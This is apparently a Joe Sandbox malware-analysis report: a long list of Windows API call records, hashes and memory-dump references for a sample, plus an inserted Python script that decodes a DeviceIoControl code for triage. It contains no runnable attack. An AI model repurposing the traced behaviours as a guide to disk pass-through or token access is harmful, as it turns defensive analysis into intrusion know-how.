                                                    • API String ID: 614378929-0
                                                    • Opcode ID: 5692c84f6f075fb9aec0abc8620894df5c32661b8150aca8818237b1cabcade8
                                                    • Instruction ID: 414bd49b3bd89338fdb83207554741153fe614d14a94cd6ce8cafd321700c3cf
                                                    • Opcode Fuzzy Hash: 5692c84f6f075fb9aec0abc8620894df5c32661b8150aca8818237b1cabcade8
                                                    • Instruction Fuzzy Hash: 1911CA32905B29AFCB207F70BC457DE37969F14BF0F105525F8489A190DE798D81BB90
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00F54385
                                                    • _memset.LIBCMT ref: 00F543A6
                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00F543F8
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F54401
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                    • String ID:
                                                    • API String ID: 1157408455-0
                                                    • Opcode ID: 1a7ff7f30d7cc12f5e28f970c8b9e270f1ab216bb9f1561a057ed9afeb508d38
                                                    • Instruction ID: 78e7d2589f8a09fc7f037ee6e76be783f5f3911f9b0b76de582d4be5f4187f0d
                                                    • Opcode Fuzzy Hash: 1a7ff7f30d7cc12f5e28f970c8b9e270f1ab216bb9f1561a057ed9afeb508d38
                                                    • Instruction Fuzzy Hash: 06110471901228BAD7309BA5AC4DFEBBB7CEF45724F00419AF908E7190D6704E849BA4
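The DeviceIoControl record above shows the control code only as the raw value 0004D02C, with a 0x200-byte input and output buffer and a handle opened by CreateFileW with read/write access (C0000000) and OPEN_EXISTING (3). As an added example, not part of the Joe Sandbox report, the following Python decodes such a value into its CTL_CODE fields (device type, function, method, access) and matches it against the ATA/SCSI pass-through codes defined in ntddscsi.h. The KNOWN table is an assumption of this example (a handful of codes a triage analyst would check first, with values derived from the standard CTL_CODE macro); the record alone does not show which ATA command was sent.

```python
"""Decode a raw Windows IOCTL value from a DeviceIoControl call record.

CTL_CODE(DeviceType, Function, Method, Access) lays the fields out as
    (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
so any value seen in a sandbox trace can be split back into its parts.
"""

FILE_DEVICE_CONTROLLER = 0x04   # IOCTL_SCSI_BASE in ntddscsi.h
FILE_DEVICE_MASS_STORAGE = 0x2D  # IOCTL_STORAGE_BASE in ntddstor.h

METHOD_NAMES = {
    0: "METHOD_BUFFERED",
    1: "METHOD_IN_DIRECT",
    2: "METHOD_OUT_DIRECT",
    3: "METHOD_NEITHER",
}
ACCESS_NAMES = {
    0: "FILE_ANY_ACCESS",
    1: "FILE_READ_ACCESS",
    2: "FILE_WRITE_ACCESS",
    3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS",
}


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Python equivalent of the CTL_CODE macro from winioctl.h."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


# Assumed lookup table for this example: pass-through style codes that let
# user-mode code hand a raw ATA/SCSI command to the disk, plus one benign
# storage query for contrast. Values are derived from the macro, not typed in.
KNOWN = {
    ctl_code(FILE_DEVICE_CONTROLLER, 0x0401, 0, 3): "IOCTL_SCSI_PASS_THROUGH",
    ctl_code(FILE_DEVICE_CONTROLLER, 0x0405, 0, 3): "IOCTL_SCSI_PASS_THROUGH_DIRECT",
    ctl_code(FILE_DEVICE_CONTROLLER, 0x040B, 0, 3): "IOCTL_ATA_PASS_THROUGH",
    ctl_code(FILE_DEVICE_CONTROLLER, 0x040C, 0, 3): "IOCTL_ATA_PASS_THROUGH_DIRECT",
    ctl_code(FILE_DEVICE_MASS_STORAGE, 0x0500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",
}


def decode_ioctl(code: int) -> dict:
    """Split an IOCTL value into its CTL_CODE fields and name it if known."""
    device_type = (code >> 16) & 0xFFFF
    access = (code >> 14) & 0x3
    function = (code >> 2) & 0xFFF
    method = code & 0x3
    return {
        "code": code,
        "device_type": device_type,
        "function": function,
        "method": METHOD_NAMES[method],
        "access": ACCESS_NAMES[access],
        "name": KNOWN.get(code),
        # Pass-through codes hand a raw command to the device: worth a
        # closer look in a trace, since they are typical of disk
        # fingerprinting (serial numbers) or direct sector access.
        "pass_through": "PASS_THROUGH" in (KNOWN.get(code) or ""),
    }


if __name__ == "__main__":
    # Constructed input: the value from the DeviceIoControl call record.
    info = decode_ioctl(0x0004D02C)
    for key, value in info.items():
        print(f"{key:>12}: {value:#x}" if isinstance(value, int) else f"{key:>12}: {value}")
```

Run stand-alone the script prints the decoded fields for 0004D02C; the same function can be applied to any other DeviceIoControl code in the report.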
                                                    APIs
                                                      • Part of subcall function 00F0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F57E51,?,?,00000000), ref: 00F04041
                                                      • Part of subcall function 00F0402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F57E51,?,?,00000000,?,?), ref: 00F04065
                                                    • gethostbyname.WSOCK32(?,?,?), ref: 00F66A84
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F66A8F
                                                    • _memmove.LIBCMT ref: 00F66ABC
                                                    • inet_ntoa.WSOCK32(?), ref: 00F66AC7
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                    • String ID:
                                                    • API String ID: 1504782959-0
                                                    • Opcode ID: 06ec56492888b3badab453fad7616b3b318f407e897e9dc8b6b903954a9dc66c
                                                    • Instruction ID: ce791e32f0019199ac8ff4e5fc5e9ebfc1de29f3ea97fe35e665a44ae99e4e7f
                                                    • Opcode Fuzzy Hash: 06ec56492888b3badab453fad7616b3b318f407e897e9dc8b6b903954a9dc66c
                                                    • Instruction Fuzzy Hash: 2E1142766001089FCB00EBA4CD46DEE77B8AF04310B144165F506A72A1DF35AE04EB91
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00F49719
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F4972B
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F49741
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00F4975C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 4618c226a8620cddd8977cf522b1c7641ecdd6632f874dee9e187236c51f849b
                                                    • Instruction ID: 966671435bc80d5459fa4b8593596a16783a6123f07517fbddb49931b65627dc
                                                    • Opcode Fuzzy Hash: 4618c226a8620cddd8977cf522b1c7641ecdd6632f874dee9e187236c51f849b
                                                    • Instruction Fuzzy Hash: 5B11483AA00218FFEB10DF95CD84EAEBBB8FB48710F204091E900B7290D6716E10EB90
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 00EF16B4
                                                    • GetClientRect.USER32(?,?), ref: 00F2B93C
                                                    • GetCursorPos.USER32(?), ref: 00F2B946
                                                    • ScreenToClient.USER32(?,?), ref: 00F2B951
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 4127811313-0
                                                    • Opcode ID: 7fd5eb417dd9b299944a8b3d5a2cacab6782cb8fa6e70804784d1d272a21afd3
                                                    • Instruction ID: c5c37caae3c4498ff53458de1afbafbef0fd1694442a42618aaff6357496aba7
                                                    • Opcode Fuzzy Hash: 7fd5eb417dd9b299944a8b3d5a2cacab6782cb8fa6e70804784d1d272a21afd3
                                                    • Instruction Fuzzy Hash: ED111336A0011DEBCB00EF98D895DFE77B8EB44301F95049AEA41E7250D730BA51DBA2
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EF214F
                                                    • GetStockObject.GDI32(00000011), ref: 00EF2163
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EF216D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CreateMessageObjectSendStockWindow
                                                    • String ID:
                                                    • API String ID: 3970641297-0
                                                    • Opcode ID: b8bdd81528f4b921417ab1a4b89fc218b6992fb07ef492b44cbb5b1ebaa33839
                                                    • Instruction ID: 28223ec38a040d8e273d4d23b82bc53d1f9ffb05efe50ac45158c435992e1ff5
                                                    • Opcode Fuzzy Hash: b8bdd81528f4b921417ab1a4b89fc218b6992fb07ef492b44cbb5b1ebaa33839
                                                    • Instruction Fuzzy Hash: DB115B7250264DBFDF124F909C84EFA7B69EF59364F451119FB0462150DB31DC60EBA4
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F504EC,?,00F5153F,?,00008000), ref: 00F5195E
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00F504EC,?,00F5153F,?,00008000), ref: 00F51983
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00F504EC,?,00F5153F,?,00008000), ref: 00F5198D
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00F504EC,?,00F5153F,?,00008000), ref: 00F519C0
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID:
                                                    • API String ID: 2875609808-0
                                                    • Opcode ID: b4543c4b7a4c34d65210daeed380be72dc2e9eb4f7b2855ce54828b51e8abd63
                                                    • Instruction ID: 807ada23a58a2c0b4399b853872fbe226db275410e3609c138fd0eb7b2d2e1a9
                                                    • Opcode Fuzzy Hash: b4543c4b7a4c34d65210daeed380be72dc2e9eb4f7b2855ce54828b51e8abd63
                                                    • Instruction Fuzzy Hash: 3E115A32C0491CDBCF009FA4D998BEEBB78FF09752F414045EE80B2241CB30A698EB91
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00F7E1EA
                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00F7E201
                                                    • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00F7E216
                                                    • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00F7E234
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                    • String ID:
                                                    • API String ID: 1352324309-0
                                                    • Opcode ID: 5d584156955b1008ebce58726aaa063887904428120148cf2d4e86c65a6e13ed
                                                    • Instruction ID: 872a2b01596614e0518005428361fbac67d84b8b4b86a29f9941570d3bb5458a
                                                    • Opcode Fuzzy Hash: 5d584156955b1008ebce58726aaa063887904428120148cf2d4e86c65a6e13ed
                                                    • Instruction Fuzzy Hash: 7F1152756453089BE7308F51DD08FA37BBCEB04B04F10859BA619D6451D7B0E508FB92
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                    • Instruction ID: 8fdb8a027a31561826b5d47114f7b61b24dbd493bd991f74e6c4d7f41c6866ae
                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                    • Instruction Fuzzy Hash: C9019E3244826EFBCF126E84EC02CEE3F22BB19350B588515FA1858171C33AC9B1BF81
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00F7B956
                                                    • ScreenToClient.USER32(?,?), ref: 00F7B96E
                                                    • ScreenToClient.USER32(?,?), ref: 00F7B992
                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F7B9AD
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                    • String ID:
                                                    • API String ID: 357397906-0
                                                    • Opcode ID: 862287d781f048ad220ef97fa68b803e0844e8090d35e5d389679dfc9fcdf9bb
                                                    • Instruction ID: b0cb96f4b3e5560eb6a832bcd1275ea1405a32e67791fd22f3ae39f23958a4d6
                                                    • Opcode Fuzzy Hash: 862287d781f048ad220ef97fa68b803e0844e8090d35e5d389679dfc9fcdf9bb
                                                    • Instruction Fuzzy Hash: FB1132B9D0020DEFDB41CF98C984AEEBBB9FF48210F508156E914E2610E735AA659F51
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F7BCB6
                                                    • _memset.LIBCMT ref: 00F7BCC5
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00FB8F20,00FB8F64), ref: 00F7BCF4
                                                    • CloseHandle.KERNEL32 ref: 00F7BD06
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                     • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseCreateHandleProcess
                                                    • String ID:
                                                    • API String ID: 3277943733-0
                                                    • Opcode ID: 305fb08954e0761ba5fc91d9216d0600920eaf372934d7a6482f849d94ac8300
                                                    • Instruction ID: eeeba6c37661e2ff000183468b09f6483b321f3f4b14190341a29491e5e4c8e0
                                                    • Opcode Fuzzy Hash: 305fb08954e0761ba5fc91d9216d0600920eaf372934d7a6482f849d94ac8300
                                                    • Instruction Fuzzy Hash: 47F05EB26403087FE3506B61AC45FFB3A5DEB49794F000521BA08D61A2DB758811FBA8
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?), ref: 00F571A1
                                                      • Part of subcall function 00F57C7F: _memset.LIBCMT ref: 00F57CB4
                                                    • _memmove.LIBCMT ref: 00F571C4
                                                    • _memset.LIBCMT ref: 00F571D1
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00F571E1
                                                    Similarity
                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                    • String ID:
                                                    • API String ID: 48991266-0
                                                    APIs
                                                      • Part of subcall function 00EF16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00EF1729
                                                      • Part of subcall function 00EF16CF: SelectObject.GDI32(?,00000000), ref: 00EF1738
                                                      • Part of subcall function 00EF16CF: BeginPath.GDI32(?), ref: 00EF174F
                                                      • Part of subcall function 00EF16CF: SelectObject.GDI32(?,00000000), ref: 00EF1778
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F7C3E8
                                                    • LineTo.GDI32(00000000,?,?), ref: 00F7C3F5
                                                    • EndPath.GDI32(00000000), ref: 00F7C405
                                                    • StrokePath.GDI32(00000000), ref: 00F7C413
                                                    Similarity
                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                    • String ID:
                                                    • API String ID: 1539411459-0
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00F4AA6F
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F4AA82
                                                    • GetCurrentThreadId.KERNEL32 ref: 00F4AA89
                                                    • AttachThreadInput.USER32(00000000), ref: 00F4AA90
                                                    Similarity
                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 2710830443-0
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 00EF260D
                                                    • SetTextColor.GDI32(?,000000FF), ref: 00EF2617
                                                    • SetBkMode.GDI32(?,00000001), ref: 00EF262C
                                                    • GetStockObject.GDI32(00000005), ref: 00EF2634
                                                    • GetWindowDC.USER32(?,00000000), ref: 00F2C1C4
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F2C1D1
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 00F2C1EA
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 00F2C203
                                                    • GetPixel.GDI32(00000000,?,?), ref: 00F2C223
                                                    • ReleaseDC.USER32(?,00000000), ref: 00F2C22E
                                                    Similarity
                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                    • String ID:
                                                    • API String ID: 1946975507-0
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 00F49339
                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00F48F04), ref: 00F49340
                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00F48F04), ref: 00F4934D
                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00F48F04), ref: 00F49354
                                                    Similarity
                                                    • API ID: CurrentOpenProcessThreadToken
                                                    • String ID:
                                                    • API String ID: 3974789173-0
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00F30679
                                                    • GetDC.USER32(00000000), ref: 00F30683
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F306A3
                                                    • ReleaseDC.USER32(?), ref: 00F306C4
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00F3068D
                                                    • GetDC.USER32(00000000), ref: 00F30697
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F306A3
                                                    • ReleaseDC.USER32(?), ref: 00F306C4
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    APIs
                                                      • Part of subcall function 00F0436A: _wcscpy.LIBCMT ref: 00F0438D
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                    • __wcsnicmp.LIBCMT ref: 00F5B670
                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F5B739
                                                    Strings
                                                    Similarity
                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                    • String ID: LPT
                                                    • API String ID: 3222508074-1350329615
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00EFE01E
                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00EFE037
                                                    Strings
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    APIs
                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00F78186
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F7819B
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '
                                                    • API String ID: 3850602802-1997036262
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F62C6A
                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F62CA0
                                                    Strings
                                                    Similarity
                                                    • API ID: CrackInternet_memset
                                                    • String ID: |
                                                    • API String ID: 1413715105-2343686810
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00F7713C
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F77178
                                                    Strings
                                                    Similarity
                                                    • API ID: Window$DestroyMove
                                                    • String ID: static
                                                    • API String ID: 2139405536-2160076837
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F530B8
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F530F3
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    APIs
                                                    • __snwprintf.LIBCMT ref: 00F64132
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                    Similarity
                                                    • API ID: __snwprintf_memmove
                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F76D86
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F76D91
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    APIs
                                                      • Part of subcall function 00EF2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EF214F
                                                      • Part of subcall function 00EF2111: GetStockObject.GDI32(00000011), ref: 00EF2163
                                                      • Part of subcall function 00EF2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EF216D
                                                    • GetWindowRect.USER32(00000000,?), ref: 00F77296
                                                    • GetSysColor.USER32(00000012), ref: 00F772B0
                                                    Similarity
                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                    • String ID: static
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00F76FC7
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F76FD6
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F531C9
                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F531E8
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F628F8
                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F62921
                                                    Similarity
                                                    • API ID: Internet$OpenOption
                                                    • String ID: <local>
                                                    APIs
                                                      • Part of subcall function 00F686E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00F6849D,?,00000000,?,?), ref: 00F686F7
                                                    • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F684A0
                                                    • htons.WSOCK32(00000000,?,00000000), ref: 00F684DD
                                                    Similarity
                                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                                    • String ID: 255.255.255.255
                                                    APIs
